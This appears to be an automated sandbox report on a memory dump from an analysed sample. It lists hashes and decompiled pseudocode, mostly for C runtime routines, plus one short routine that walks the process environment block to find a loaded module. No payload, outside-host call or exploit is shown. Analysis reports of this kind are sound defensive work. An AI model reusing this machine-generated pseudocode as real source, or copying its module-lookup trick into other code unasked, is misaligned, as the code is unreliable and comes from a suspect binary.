Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5808a4c80d3016502dc6e4ed8f1a094673abc2e4b554b3c324c012efd86656
Instruction ID: 9b532fc03834e230ab2133a155e220b5fc53f65f05a4210431d0e37db4cefe1c
Opcode Fuzzy Hash: 2e5808a4c80d3016502dc6e4ed8f1a094673abc2e4b554b3c324c012efd86656
Instruction Fuzzy Hash: 64E04631000648EFDF216FA4CE89AC83B69EF40381F108624FD489B122CF35DE42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000C9E2B, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b533e3374486e534638c2d2179cba0d3e6042a64eef1efaf6d759d031b1635
Instruction ID: edbeea8e5c6fb71a69e4ec0f3e4306e3e624e4c01aab7cdbfdcf77d98798730a
Opcode Fuzzy Hash: 23b533e3374486e534638c2d2179cba0d3e6042a64eef1efaf6d759d031b1635
Instruction Fuzzy Hash: 1EC0123364510006C2285D1C6C853A0F738D7A3238E45A792E845D7151C182C4958188

Uniqueness

Uniqueness Score: -1.00%

Function 000CBC10, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
Instruction ID: 74fc0706d39a7bc634382559c14bd00d220f343a0a708aa946c05706e07cdea6
Opcode Fuzzy Hash: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
Instruction Fuzzy Hash: 45C04C70A451585BDB0889799E127EA76988305211F1402BD780FC2244E55E591055A6

Uniqueness

Uniqueness Score: -1.00%

Function 000B02BD, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: 467d06f9c49a0941c72f71f005456f060fe8b90e1924536a966f2d3b50cc12fe
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: 2EB092606165804AEB6683248419B4676E0AB40B41F8994E0E00582D81C25C89889100

Uniqueness

Uniqueness Score: -1.00%

Function 000A7A20, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A7A20() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x000a7a33

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 000B0D23, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 0009197C, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0009197C(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;
				intOrPtr _t39;

				_t14 = __ebx;
				__imp__DecodePointer( *0xf1b34);
				_t25 =  *0xefcfc; // 0x0
				_t24 = __eax;
				if(_t25 == 0) {
					L4:
					_push(_t14);
					E000932B6(_t25);
					_t26 =  *0xefcf8; // 0x7cee78
					 *0xefcfc = 0;
					if(_t26 == 0) {
						L8:
						E000932B6(_t26);
						 *0xefcf8 = 0;
						E000932B6( *0xefcf4);
						_t5 = E000932B6( *0xefcf0);
						_t27 = _t26 | 0xffffffff;
						 *0xefcf4 = 0;
						 *0xefcf0 = 0;
						if(_t24 != _t27) {
							_t39 =  *0xf1b34; // 0x7e48ae20
							if(_t39 != 0) {
								_t5 = E000932B6(_t24);
							}
						}
						__imp__EncodePointer(_t27);
						 *0xf1b34 = _t5;
						_t6 =  *0xf06f4; // 0x0
						if(_t6 != 0) {
							E000932B6(_t6);
							 *0xf06f4 = 0;
						}
						_t7 =  *0xf06f8; // 0x0
						if(_t7 != 0) {
							E000932B6(_t7);
							 *0xf06f8 = 0;
						}
						_t8 =  *0xae7d4; // 0x7de008
						asm("lock xadd [eax], esi");
						if(_t27 != 1) {
							L18:
							return _t8;
						} else {
							_t8 =  *0xae7d4; // 0x7de008
							if(_t8 == 0xae5b0) {
								goto L18;
							}
							_t9 = E000932B6(_t8);
							 *0xae7d4 = 0xae5b0;
							return _t9;
						}
					}
					while( *_t26 != 0) {
						E000932B6( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0xefcf8; // 0x7cee78
					goto L8;
				}
				while( *_t25 != 0) {
					E000932B6( *_t25);
					_t25 = _t25 + 4;
					if(_t25 != 0) {
						continue;
					}
					break;
				}
				_t25 =  *0xefcfc; // 0x0
				goto L4;
			}

0x0009197c
0x00091984
0x0009198a
0x00091990
0x00091994
0x000919ae
0x000919ae
0x000919b0
0x000919b5
0x000919bd
0x000919c6
0x000919df
0x000919e0
0x000919eb
0x000919f1
0x000919fc
0x00091a01
0x00091a04
0x00091a0d
0x00091a15
0x00091a17
0x00091a1d
0x00091a20
0x00091a25
0x00091a1d
0x00091a27
0x00091a2d
0x00091a32
0x00091a39
0x00091a3c
0x00091a42
0x00091a42
0x00091a48
0x00091a4f
0x00091a52
0x00091a58
0x00091a58
0x00091a5e
0x00091a63
0x00091a69
0x00091a88
0x00091a88
0x00091a6b
0x00091a6b
0x00091a77
0x00000000
0x00000000
0x00091a7a
0x00091a80
0x00000000
0x00091a80
0x00091a69
0x000919c8
0x000919ce
0x000919d4
0x000919d7
0x00000000
0x00000000
0x00000000
0x000919d7
0x000919d9
0x00000000
0x000919d9
0x00091996
0x0009199d
0x000919a3
0x000919a6
0x00000000
0x00000000
0x00000000
0x000919a6
0x000919a8
0x00000000

APIs

DecodePointer.KERNEL32 ref: 00091984
_free.LIBCMT ref: 0009199D

Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC

_free.LIBCMT ref: 000919B0
_free.LIBCMT ref: 000919CE
_free.LIBCMT ref: 000919E0
_free.LIBCMT ref: 000919F1
_free.LIBCMT ref: 000919FC
_free.LIBCMT ref: 00091A20
EncodePointer.KERNEL32(007CEE78), ref: 00091A27
_free.LIBCMT ref: 00091A3C
_free.LIBCMT ref: 00091A52
_free.LIBCMT ref: 00091A7A

Strings

hn}, xrefs: 000919F6, 00091A0D
x|, xrefs: 000919B5, 000919D9, 000919EB

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID: hn}$x|
API String ID: 3064303923-1412816383
Opcode ID: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
Instruction ID: 55037b5f61b98b7ab115b077da11ff23c629134b0c359b20dc8f913433ebceba
Opcode Fuzzy Hash: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
Instruction Fuzzy Hash: 98217E72B061538FEF609F24FD809A9B7E5AB06B213350039EC14A7266DF388D44EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00098E85, Relevance: 19.6, APIs: 13, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00098E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E000932EE(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E000932EE(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E000932EE(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E0009899A( *_t42, 0xae2e8);
								_t15 = E00099285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E000932B6();
									E0009363B( *_t42);
									E000934E1( *_t42);
									E000932B6(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00093D75(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E000932B6( *_t42);
							E000932B6(_t42);
							L8:
							goto L3;
						}
						E000932B6(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00094196(_t48))) = 0xc;
					goto L4;
				}
			}

0x00098e8e
0x00098eb4
0x00000000
0x00098e96
0x00098ea1
0x00098ea5
0x00098ea7
0x00098ec0
0x00098ec5
0x00098ec9
0x00098ecb
0x00098edc
0x00098ee1
0x00098ee6
0x00098ee8
0x00098f01
0x00098f0e
0x00098f16
0x00098f19
0x00098f1b
0x00098f30
0x00098f30
0x00098f37
0x00098f3e
0x00098f44
0x00098f4c
0x00098f55
0x00000000
0x00098f55
0x00098f1f
0x00098f22
0x00098f29
0x00098f2b
0x00098f53
0x00000000
0x00098f53
0x00098f2d
0x00000000
0x00098f2d
0x00098eec
0x00098ef2
0x00098ed3
0x00000000
0x00098ed3
0x00098ece
0x00000000
0x00098ece
0x00098ea9
0x00098eae
0x00000000
0x00098eae

APIs

__calloc_crt.LIBCMT ref: 00098E9C

Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD

__calloc_crt.LIBCMT ref: 00098EC0
_free.LIBCMT ref: 00098ECE
__calloc_crt.LIBCMT ref: 00098EDC
_free.LIBCMT ref: 00098EEC
_free.LIBCMT ref: 00098EF2
__copytlocinfo_nolock.LIBCMT ref: 00098F01
__wsetlocale_nolock.LIBCMT ref: 00098F0E
__setmbcp_nolock.LIBCMT ref: 00098F22
_free.LIBCMT ref: 00098F30
___removelocaleref.LIBCMT ref: 00098F37
___freetlocinfo.LIBCMT ref: 00098F3E
_free.LIBCMT ref: 00098F44

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 620447d826ed4e0eb0b49abdffd8f129432ae38556badfaaeb61fad8a4326c2f
Instruction ID: b97cb3ffaf5d7643bf12991928e3b030b4792723ad36ee483a36947f184643f8
Opcode Fuzzy Hash: 620447d826ed4e0eb0b49abdffd8f129432ae38556badfaaeb61fad8a4326c2f
Instruction Fuzzy Hash: E221A835104611EAEF717F65DC12E9BBBE5DF43750B108429F448592A3EF328910FB55

Uniqueness

Uniqueness Score: -1.00%

Function 00098F5C, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00098F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E0009551B(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00094112(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0xacf88);
					E000927F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E000915FE();
						_v36 = _t88;
						E000936DB(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E000932EE(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00093117(0xc);
							_v8 = 1;
							E0009899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E000990D1();
							_t66 = E00099285(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0009363B(_t83);
								_t43 = E000934E1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E0009DB06(_a8, 0xae17c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0xf0a44 = 1;
									}
								}
								E00093117(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0009375B(_t25, _t83);
								E0009363B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0xaecf4 & 0x00000001;
									if(( *0xaecf4 & 0x00000001) == 0) {
										E0009375B("��",  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0xae2e4; // 0xae2e8
										_t32 = _t77 + 0x84; // 0xaed00
										 *0xaecf8 =  *_t32;
										_t33 = _t77 + 0x90; // 0xa9570
										 *0xaed54 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0xae178 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E000990E0();
							}
						}
						_v8 = 0xfffffffe;
						E00099113(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00094196(__eflags))) = 0x16;
						E000940E7();
						_t45 = 0;
					}
					return E00092835(_t45);
				}
				L20:
			}

0x00098f5c
0x00098f5f
0x00098f62
0x00098f63
0x00098f68
0x00098f8c
0x00098f8f
0x00098f6a
0x00098f6a
0x00098f6b
0x00098f6e
0x00098f6e
0x00098f79
0x00098f7e
0x00098f83
0x00000000
0x00000000
0x00098f85
0x00098f89
0x00000000
0x00098f8b
0x00000000
0x00098f8b
0x00000000
0x00098f89
0x00098f90
0x00098f91
0x00098f92
0x00098f93
0x00098f94
0x00098f95
0x00098f9a
0x00098f9b
0x00098f9d
0x00098fa2
0x00098fa7
0x00098fa9
0x00098fac
0x00098fb0
0x00098fce
0x00098fd0
0x00098fd3
0x00098fd8
0x00098fdc
0x00098fed
0x00098fef
0x00098ff2
0x00098ff4
0x00098ffc
0x00099002
0x0009900d
0x00099014
0x00099018
0x0009902c
0x0009902e
0x00099031
0x00099033
0x000990ec
0x000990f2
0x00099039
0x00099039
0x0009903d
0x00099047
0x0009904e
0x00099050
0x00099052
0x00099052
0x00099050
0x0009905e
0x00099064
0x0009906b
0x00099070
0x00099076
0x0009907e
0x00099082
0x00099084
0x0009908b
0x00099095
0x0009909c
0x000990a2
0x000990a8
0x000990ad
0x000990b3
0x000990b8
0x000990bb
0x000990bb
0x0009908b
0x000990c0
0x000990c4
0x000990c4
0x00099033
0x000990f9
0x00099100
0x00099105
0x00098fb2
0x00098fb7
0x00098fbd
0x00098fc2
0x00098fc2
0x0009910c
0x0009910c
0x00000000

APIs

__calloc_crt.LIBCMT ref: 00098FE6
__lock.LIBCMT ref: 00098FFC
__copytlocinfo_nolock.LIBCMT ref: 0009900D
__wsetlocale_nolock.LIBCMT ref: 00099024
__lock.LIBCMT ref: 0009905E
__updatetlocinfoEx_nolock.LIBCMT ref: 00099070
___removelocaleref.LIBCMT ref: 00099076
__updatetlocinfoEx_nolock.LIBCMT ref: 00099095

Strings

, xrefs: 00099090, 0009909C

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
String ID:
API String ID: 790675137-2599400749
Opcode ID: 96057e90ca0431be5a46350261f82ec6f038a27f70e7c8780814232b96e4b257
Instruction ID: 34fa5f32ff1382576646ec1ec41aad014c6188766e5efbf1e73dae29dbb38186
Opcode Fuzzy Hash: 96057e90ca0431be5a46350261f82ec6f038a27f70e7c8780814232b96e4b257
Instruction Fuzzy Hash: E941C132504305AFDF20AFA8DD82BDD7BE5AF45314F10842DFA1896293DB768641EB51

Uniqueness

Uniqueness Score: -1.00%

Function 000917CB, Relevance: 15.1, APIs: 10, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E000917CB(void* __edx, char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				intOrPtr* _t7;
				intOrPtr _t9;
				short* _t10;
				short* _t12;
				short* _t14;
				int _t15;
				short* _t22;
				int _t24;
				void* _t27;
				void* _t31;
				short* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_push(_t27);
				_t24 = 0;
				_t36 = _a4;
				if(_a4 != 0) {
					_t33 = _a8;
					__eflags = _t33;
					if(__eflags == 0) {
						goto L1;
					}
					_t10 = E00092D64(_t27);
					__eflags = _t10;
					if(_t10 == 0) {
						_t22 = AreFileApisANSI();
						__eflags = _t22;
						if(_t22 == 0) {
							_t24 = 1;
							__eflags = 1;
						}
					}
					 *_t33 = 0;
					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
					_v8 = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00093336(_t31, _t12 + _t12);
						 *_t33 = _t14;
						__eflags = _t14;
						if(_t14 == 0) {
							goto L9;
						}
						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
						__eflags = _t15;
						if(_t15 != 0) {
							_t9 = 1;
							__eflags = 1;
							goto L14;
						}
						E00094175(GetLastError());
						E000932B6( *_t33);
						 *_t33 =  *_t33 & 0x00000000;
						goto L8;
					} else {
						E00094175(GetLastError());
						L8:
						L9:
						_t9 = 0;
						L14:
						return _t9;
					}
				}
				L1:
				_t7 = E00094196(_t36);
				_t34 = 0x16;
				 *_t7 = _t34;
				E000940E7();
				_t9 = _t34;
				goto L14;
			}

0x000917cb
0x000917ce
0x000917d0
0x000917d3
0x000917d6
0x000917ee
0x000917f1
0x000917f3
0x00000000
0x00000000
0x000917f5
0x000917fa
0x000917fc
0x000917fe
0x00091804
0x00091806
0x0009180a
0x0009180a
0x0009180a
0x00091806
0x00091814
0x00091818
0x0009181e
0x00091821
0x00091823
0x00091839
0x0009183e
0x00091841
0x00091843
0x00000000
0x00000000
0x00091851
0x00091857
0x00091859
0x00091876
0x00091876
0x00000000
0x00091876
0x00091862
0x00091869
0x0009186e
0x00000000
0x00091825
0x0009182c
0x00091831
0x00091832
0x00091832
0x00091877
0x0009187c
0x0009187c
0x00091823
0x000917d8
0x000917d8
0x000917df
0x000917e0
0x000917e2
0x000917e7
0x00000000

APIs

___crtIsPackagedApp.LIBCMT ref: 000917F5
AreFileApisANSI.KERNEL32 ref: 000917FE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00091818
GetLastError.KERNEL32 ref: 00091825
__dosmaperr.LIBCMT ref: 0009182C

Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
String ID:
API String ID: 1083238821-0
Opcode ID: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
Instruction ID: 024ed592de540ba5a6cdae41f488b0d52b33d50c810ab537c6bc44784393a71c
Opcode Fuzzy Hash: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
Instruction Fuzzy Hash: 34118EB2604206BFEF606FB09C08EEBB6ECEF05761B208528F951D5192EE30C841B760

Uniqueness

Uniqueness Score: -1.00%

Function 00091738, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00091738(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00091BC7(_t3);
				if(E00093268() != 0) {
					_t6 = E00092BEF(E00091493);
					 *0xae000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E000932EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E000917AE();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00092C4B( *0xae000, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00091685(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E000917AE();
					return 0;
				}
			}

0x00091738
0x00091744
0x00091753
0x00091758
0x0009175e
0x00091761
0x00000000
0x00091763
0x00091770
0x00091774
0x00091776
0x000917a5
0x000917a5
0x000917aa
0x000917ad
0x00091778
0x00091786
0x00091788
0x00000000
0x0009178a
0x0009178a
0x0009178c
0x0009178d
0x00091794
0x0009179a
0x0009179e
0x000917a2
0x000917a4
0x000917a4
0x00091788
0x00091776
0x00091746
0x00091746
0x00091746
0x0009174d
0x0009174d

APIs

__init_pointers.LIBCMT ref: 00091738

Part of subcall function 00091BC7: RtlEncodePointer.NTDLL(00000000,?,0009173D,0009112C,000ACCC0,00000014), ref: 00091BCA
Part of subcall function 00091BC7: __initp_misc_winsig.LIBCMT ref: 00091BE5
Part of subcall function 00091BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00092DAE
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00092DC2
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00092DD5
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00092DE8
